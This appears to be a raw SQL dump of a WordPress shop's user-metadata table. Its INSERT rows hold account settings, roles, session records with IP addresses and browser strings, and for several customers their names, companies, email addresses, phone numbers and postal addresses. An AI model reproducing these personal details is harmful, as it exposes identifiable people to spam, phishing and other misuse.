INSERT INTO `wp_usermeta` VALUES (1105, 54, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1106, 54, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1107, 54, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1108, 54, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1109, 54, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1110, 54, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1111, 54, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1112, 54, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1113, 54, '_yoast_wpseo_profile_updated', '1475862564'); 
INSERT INTO `wp_usermeta` VALUES (1114, 54, 'session_tokens', 'a:1:{s:64:"4891e03acd0962a279ad2c6d006d7ea5e8ad25ae2519cb75f55048537bd14760";a:4:{s:10:"expiration";i:1477072164;s:2:"ip";s:13:"64.33.177.139";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1475862564;}}'); 
INSERT INTO `wp_usermeta` VALUES (1115, 54, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1117, 55, 'nickname', 'mkipphorn'); 
INSERT INTO `wp_usermeta` VALUES (1118, 55, 'first_name', 'Matthew'); 
INSERT INTO `wp_usermeta` VALUES (1119, 55, 'last_name', 'Kipphorn'); 
INSERT INTO `wp_usermeta` VALUES (1120, 55, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1121, 55, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1122, 55, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1123, 55, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1124, 55, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1125, 55, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1126, 55, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1127, 55, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1128, 55, '_yoast_wpseo_profile_updated', '1475868404'); 
INSERT INTO `wp_usermeta` VALUES (1129, 55, 'session_tokens', 'a:1:{s:64:"357f2998265fecf254658dca8b18b48ea7fd1c8e34d264887fc71f8a5f24706b";a:4:{s:10:"expiration";i:1477078004;s:2:"ip";s:11:"107.0.202.3";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";s:5:"login";i:1475868404;}}'); 
INSERT INTO `wp_usermeta` VALUES (1130, 55, 'last_update', '1475868476'); 
INSERT INTO `wp_usermeta` VALUES (1131, 55, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1132, 3, 'metaboxhidden_dashboard', 'a:11:{i:0;s:29:"wp-statistics-browsers-widget";i:1;s:30:"wp-statistics-countries-widget";i:2;s:28:"wp-statistics-hitsmap-widget";i:3;s:25:"wp-statistics-hits-widget";i:4;s:26:"wp-statistics-pages-widget";i:5;s:27:"wp-statistics-recent-widget";i:6;s:30:"wp-statistics-referring-widget";i:7;s:27:"wp-statistics-search-widget";i:8;s:28:"wp-statistics-summary-widget";i:9;s:26:"wp-statistics-words-widget";i:10;s:33:"wp-statistics-top-visitors-widget";}'); 
INSERT INTO `wp_usermeta` VALUES (1134, 56, 'nickname', 'laura.ferriere'); 
INSERT INTO `wp_usermeta` VALUES (1135, 56, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1136, 56, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1137, 56, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1138, 56, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1139, 56, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1140, 56, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1141, 56, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1142, 56, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1143, 56, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1144, 56, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1145, 56, '_yoast_wpseo_profile_updated', '1476091903'); 
INSERT INTO `wp_usermeta` VALUES (1146, 56, 'session_tokens', 'a:1:{s:64:"b05b43825d8c9ef5581242116853d96ca8027e35a34e9053c823a3e5cd6ebf8c";a:4:{s:10:"expiration";i:1479483741;s:2:"ip";s:13:"46.226.50.229";s:2:"ua";s:85:"Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0 VirtualBrowser/1.0";s:5:"login";i:1479310941;}}'); 
INSERT INTO `wp_usermeta` VALUES (1147, 56, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1152, 57, 'nickname', 'hillj.ctr'); 
INSERT INTO `wp_usermeta` VALUES (1153, 57, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1154, 57, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1155, 57, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1156, 57, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1157, 57, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1158, 57, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1159, 57, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1160, 57, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1161, 57, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1162, 57, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1163, 57, '_yoast_wpseo_profile_updated', '1476110325'); 
INSERT INTO `wp_usermeta` VALUES (1164, 57, 'session_tokens', 'a:1:{s:64:"d1b78648dbe3455cf0cb20f1e110a1eeea59c8686ae6d46cbfcca342760ded28";a:4:{s:10:"expiration";i:1477319925;s:2:"ip";s:13:"66.192.28.227";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1476110325;}}'); 
INSERT INTO `wp_usermeta` VALUES (1168, 58, 'nickname', 'eric.hudak'); 
INSERT INTO `wp_usermeta` VALUES (1169, 58, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1170, 58, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1171, 58, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1172, 58, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1173, 58, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1174, 58, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1175, 58, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1176, 58, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1177, 58, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1178, 58, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1179, 58, '_yoast_wpseo_profile_updated', '1476123028'); 
INSERT INTO `wp_usermeta` VALUES (1180, 58, 'session_tokens', 'a:1:{s:64:"d0ab81c263f0d52d604202987e9b348a183b06349fc0e690e446673182aa71f5";a:4:{s:10:"expiration";i:1477332628;s:2:"ip";s:14:"12.207.238.130";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36";s:5:"login";i:1476123028;}}'); 
INSERT INTO `wp_usermeta` VALUES (1181, 58, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1182, 59, 'nickname', 'crood'); 
INSERT INTO `wp_usermeta` VALUES (1183, 59, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1184, 59, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1185, 59, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1186, 59, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1187, 59, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1188, 59, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1189, 59, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1190, 59, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1191, 59, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1192, 59, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1193, 59, '_yoast_wpseo_profile_updated', '1476124635'); 
INSERT INTO `wp_usermeta` VALUES (1194, 59, 'session_tokens', 'a:1:{s:64:"91270d0b21261fda318342ce5b7b7c85cbca3421f951d83784c626a6f755d47e";a:4:{s:10:"expiration";i:1477334235;s:2:"ip";s:14:"12.197.156.189";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1476124635;}}'); 
INSERT INTO `wp_usermeta` VALUES (1195, 59, 'billing_first_name', 'Colleen'); 
INSERT INTO `wp_usermeta` VALUES (1196, 59, 'billing_last_name', 'Rood'); 
INSERT INTO `wp_usermeta` VALUES (1197, 59, 'billing_company', 'Dymax Corporation'); 
INSERT INTO `wp_usermeta` VALUES (1198, 59, 'billing_email', 'crood@dymax.com'); 
INSERT INTO `wp_usermeta` VALUES (1199, 59, 'billing_phone', '860-482-1010'); 
INSERT INTO `wp_usermeta` VALUES (1200, 59, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (1201, 59, 'billing_address_1', '318 Industrial Lane'); 
INSERT INTO `wp_usermeta` VALUES (1202, 59, 'billing_address_2', 'EH&S Department'); 
INSERT INTO `wp_usermeta` VALUES (1203, 59, 'billing_city', 'Torrington'); 
INSERT INTO `wp_usermeta` VALUES (1204, 59, 'billing_state', 'CT'); 
INSERT INTO `wp_usermeta` VALUES (1205, 59, 'billing_postcode', '06790'); 
INSERT INTO `wp_usermeta` VALUES (1206, 60, 'nickname', 'tereasa.g.williams'); 
INSERT INTO `wp_usermeta` VALUES (1207, 60, 'first_name', 'Tereasa'); 
INSERT INTO `wp_usermeta` VALUES (1208, 60, 'last_name', 'Williams'); 
INSERT INTO `wp_usermeta` VALUES (1209, 60, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1210, 60, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1211, 60, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1212, 60, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1213, 60, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1214, 60, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1215, 60, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1216, 60, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1217, 60, '_yoast_wpseo_profile_updated', '1476124762'); 
INSERT INTO `wp_usermeta` VALUES (1218, 60, 'session_tokens', 'a:1:{s:64:"878a40f95f410bac28eecffbc4a011b67c2de71bf1b7abd41fb3aba51b20cfdb";a:4:{s:10:"expiration";i:1477334362;s:2:"ip";s:13:"192.65.41.109";s:2:"ua";s:69:"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1476124762;}}'); 
INSERT INTO `wp_usermeta` VALUES (1219, 60, 'last_update', '1476124809'); 
INSERT INTO `wp_usermeta` VALUES (1220, 60, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1221, 59, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1222, 33, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1231, 12, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1235, 61, 'nickname', 'sbrooks'); 
INSERT INTO `wp_usermeta` VALUES (1236, 61, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1237, 61, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1238, 61, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1239, 61, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1240, 61, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1241, 61, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1242, 61, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1243, 61, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1244, 61, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1245, 61, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1246, 61, '_yoast_wpseo_profile_updated', '1476249166'); 
INSERT INTO `wp_usermeta` VALUES (1247, 61, 'session_tokens', 'a:1:{s:64:"e94539c28a6187b336b743efba1174407d6e1533d62e704b89e1c7cbd39075b1";a:4:{s:10:"expiration";i:1477458767;s:2:"ip";s:15:"103.232.232.132";s:2:"ua";s:102:"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";s:5:"login";i:1476249167;}}'); 
INSERT INTO `wp_usermeta` VALUES (1248, 1, 'closedpostboxes_toplevel_page_wps_overview_page', 'a:0:{}'); 
INSERT INTO `wp_usermeta` VALUES (1249, 1, 'metaboxhidden_toplevel_page_wps_overview_page', 'a:0:{}'); 
INSERT INTO `wp_usermeta` VALUES (1250, 62, 'nickname', 'amorin'); 
INSERT INTO `wp_usermeta` VALUES (1251, 62, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1252, 62, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1253, 62, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1254, 62, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1255, 62, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1256, 62, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1257, 62, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1258, 62, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1259, 62, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1260, 62, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1261, 62, '_yoast_wpseo_profile_updated', '1476274379'); 
INSERT INTO `wp_usermeta` VALUES (1262, 62, 'session_tokens', 'a:1:{s:64:"08fb4afdcca5727166a6384f69ec7d4940e7499a8da896085aae37714e80919a";a:4:{s:10:"expiration";i:1477483979;s:2:"ip";s:12:"71.174.98.70";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";s:5:"login";i:1476274379;}}'); 
INSERT INTO `wp_usermeta` VALUES (1264, 63, 'nickname', 'doug.streeten'); 
INSERT INTO `wp_usermeta` VALUES (1265, 63, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1266, 63, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1267, 63, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1268, 63, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1269, 63, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1270, 63, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1271, 63, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1272, 63, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1273, 63, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1274, 63, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1275, 63, '_yoast_wpseo_profile_updated', '1476278530'); 
INSERT INTO `wp_usermeta` VALUES (1276, 63, 'session_tokens', 'a:1:{s:64:"d72f539d8aee05109b37e7fcab35c1b0c5bd872815ee38db46bc94238545a98a";a:4:{s:10:"expiration";i:1477488130;s:2:"ip";s:12:"12.40.148.10";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";s:5:"login";i:1476278530;}}'); 
INSERT INTO `wp_usermeta` VALUES (1277, 63, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1281, 1, 'closedpostboxes_dashboard', 'a:1:{i:0;s:18:"dashboard_activity";}'); 
INSERT INTO `wp_usermeta` VALUES (1282, 64, 'nickname', 'Joanna'); 
INSERT INTO `wp_usermeta` VALUES (1283, 64, 'first_name', 'Joanna'); 
INSERT INTO `wp_usermeta` VALUES (1284, 64, 'last_name', 'Saffo'); 
INSERT INTO `wp_usermeta` VALUES (1285, 64, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1286, 64, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1287, 64, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1288, 64, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1289, 64, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1290, 64, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1291, 64, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1292, 64, 'wp_user_level', '10'); 
INSERT INTO `wp_usermeta` VALUES (1293, 64, '_yoast_wpseo_profile_updated', '1500402647'); 
INSERT INTO `wp_usermeta` VALUES (1294, 64, 'session_tokens', 'a:1:{s:64:"5ba9615c2668e00ce2e5c0be794bae82b385dfae1cff30dbb6d69b58669bbf71";a:4:{s:10:"expiration";i:1500575476;s:2:"ip";s:12:"32.209.36.31";s:2:"ua";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36";s:5:"login";i:1500402676;}}'); 
INSERT INTO `wp_usermeta` VALUES (1295, 64, 'wpseo_title', ''); 
INSERT INTO `wp_usermeta` VALUES (1296, 64, 'wpseo_metadesc', ''); 
INSERT INTO `wp_usermeta` VALUES (1297, 64, 'wpseo_metakey', ''); 
INSERT INTO `wp_usermeta` VALUES (1298, 64, 'wpseo_excludeauthorsitemap', ''); 
INSERT INTO `wp_usermeta` VALUES (1299, 64, 'wpseo_content_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (1300, 64, 'wpseo_keyword_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (1301, 64, 'billing_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1302, 64, 'billing_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1303, 64, 'billing_company', ''); 
INSERT INTO `wp_usermeta` VALUES (1304, 64, 'billing_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (1305, 64, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (1306, 64, 'billing_city', ''); 
INSERT INTO `wp_usermeta` VALUES (1307, 64, 'billing_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (1308, 64, 'billing_country', ''); 
INSERT INTO `wp_usermeta` VALUES (1309, 64, 'billing_state', ''); 
INSERT INTO `wp_usermeta` VALUES (1310, 64, 'billing_phone', ''); 
INSERT INTO `wp_usermeta` VALUES (1311, 64, 'billing_email', ''); 
INSERT INTO `wp_usermeta` VALUES (1312, 64, 'shipping_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1313, 64, 'shipping_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1314, 64, 'shipping_company', ''); 
INSERT INTO `wp_usermeta` VALUES (1315, 64, 'shipping_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (1316, 64, 'shipping_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (1317, 64, 'shipping_city', ''); 
INSERT INTO `wp_usermeta` VALUES (1318, 64, 'shipping_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (1319, 64, 'shipping_country', ''); 
INSERT INTO `wp_usermeta` VALUES (1320, 64, 'shipping_state', ''); 
INSERT INTO `wp_usermeta` VALUES (1321, 64, 'last_update', '1500402647'); 
INSERT INTO `wp_usermeta` VALUES (1322, 64, 'googleplus', ''); 
INSERT INTO `wp_usermeta` VALUES (1323, 64, 'twitter', ''); 
INSERT INTO `wp_usermeta` VALUES (1324, 64, 'facebook', ''); 
INSERT INTO `wp_usermeta` VALUES (1326, 65, 'nickname', 'sszucs'); 
INSERT INTO `wp_usermeta` VALUES (1327, 65, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1328, 65, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1329, 65, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1330, 65, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1331, 65, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1332, 65, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1333, 65, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1334, 65, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1335, 65, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1336, 65, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1337, 65, '_yoast_wpseo_profile_updated', '1476299880'); 
INSERT INTO `wp_usermeta` VALUES (1339, 65, 'session_tokens', 'a:1:{s:64:"a97a6122d389684a16bb322b0f1299047c8469bd3488d0c4908c473673c770af";a:4:{s:10:"expiration";i:1477509481;s:2:"ip";s:13:"64.80.221.178";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";s:5:"login";i:1476299881;}}'); 
INSERT INTO `wp_usermeta` VALUES (1340, 65, 'billing_first_name', 'Susan'); 
INSERT INTO `wp_usermeta` VALUES (1341, 65, 'billing_last_name', 'Szucs'); 
INSERT INTO `wp_usermeta` VALUES (1342, 65, 'billing_company', 'Gowanda Electronics LLC'); 
INSERT INTO `wp_usermeta` VALUES (1343, 65, 'billing_email', 'sszucs@gowanda.com'); 
INSERT INTO `wp_usermeta` VALUES (1344, 65, 'billing_phone', '716-532-2234'); 
INSERT INTO `wp_usermeta` VALUES (1345, 65, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (1346, 65, 'billing_address_1', 'One Magnetics Parkway'); 
INSERT INTO `wp_usermeta` VALUES (1347, 65, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (1348, 65, 'billing_city', 'Gowanda'); 
INSERT INTO `wp_usermeta` VALUES (1349, 65, 'billing_state', 'NY'); 
INSERT INTO `wp_usermeta` VALUES (1350, 65, 'billing_postcode', '14070'); 
INSERT INTO `wp_usermeta` VALUES (1351, 65, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1353, 66, 'nickname', 'laurenk'); 
INSERT INTO `wp_usermeta` VALUES (1354, 66, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1355, 66, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1356, 66, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1357, 66, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1358, 66, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1359, 66, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1360, 66, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1361, 66, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1362, 66, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1363, 66, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1364, 66, '_yoast_wpseo_profile_updated', '1476302091'); 
INSERT INTO `wp_usermeta` VALUES (1365, 66, 'session_tokens', 'a:1:{s:64:"a2bc6a60974825b1f98e9f82cb92a77ce3a820dac276a359a6951478305896a9";a:4:{s:10:"expiration";i:1493391905;s:2:"ip";s:12:"74.68.32.161";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36";s:5:"login";i:1493219105;}}'); 
INSERT INTO `wp_usermeta` VALUES (1367, 66, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1368, 67, 'nickname', 'dbernhardt'); 
INSERT INTO `wp_usermeta` VALUES (1369, 67, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1370, 67, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1371, 67, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1372, 67, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1373, 67, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1374, 67, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1375, 67, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1376, 67, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1377, 67, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1378, 67, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1379, 67, '_yoast_wpseo_profile_updated', '1476302741'); 
INSERT INTO `wp_usermeta` VALUES (1381, 67, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1382, 1, 'session_tokens', 'a:2:{s:64:"df739956d73e07c705593d0facee28ae311610ff2a457de4d6e6986bccd90b9a";a:4:{s:10:"expiration";i:1501936189;s:2:"ip";s:13:"198.0.163.153";s:2:"ua";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36";s:5:"login";i:1501763389;}s:64:"182d3623f62ee837dc89a8f5d5b884f1dc8feec89a0affd608378c9713cd31ce";a:4:{s:10:"expiration";i:1502019125;s:2:"ip";s:13:"198.0.163.153";s:2:"ua";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36";s:5:"login";i:1501846325;}}'); 
INSERT INTO `wp_usermeta` VALUES (1383, 68, 'nickname', 'managed-wp-migration-7304df43'); 
INSERT INTO `wp_usermeta` VALUES (1384, 68, 'first_name', 'Managed WordPress Migration User'); 
INSERT INTO `wp_usermeta` VALUES (1385, 68, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1386, 68, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1387, 68, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1388, 68, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1389, 68, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1390, 68, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1391, 68, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1392, 68, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1393, 68, 'wp_user_level', '10'); 
INSERT INTO `wp_usermeta` VALUES (1394, 68, '_yoast_wpseo_profile_updated', '1476358135'); 
INSERT INTO `wp_usermeta` VALUES (1395, 68, 'last_update', '1476358135'); 
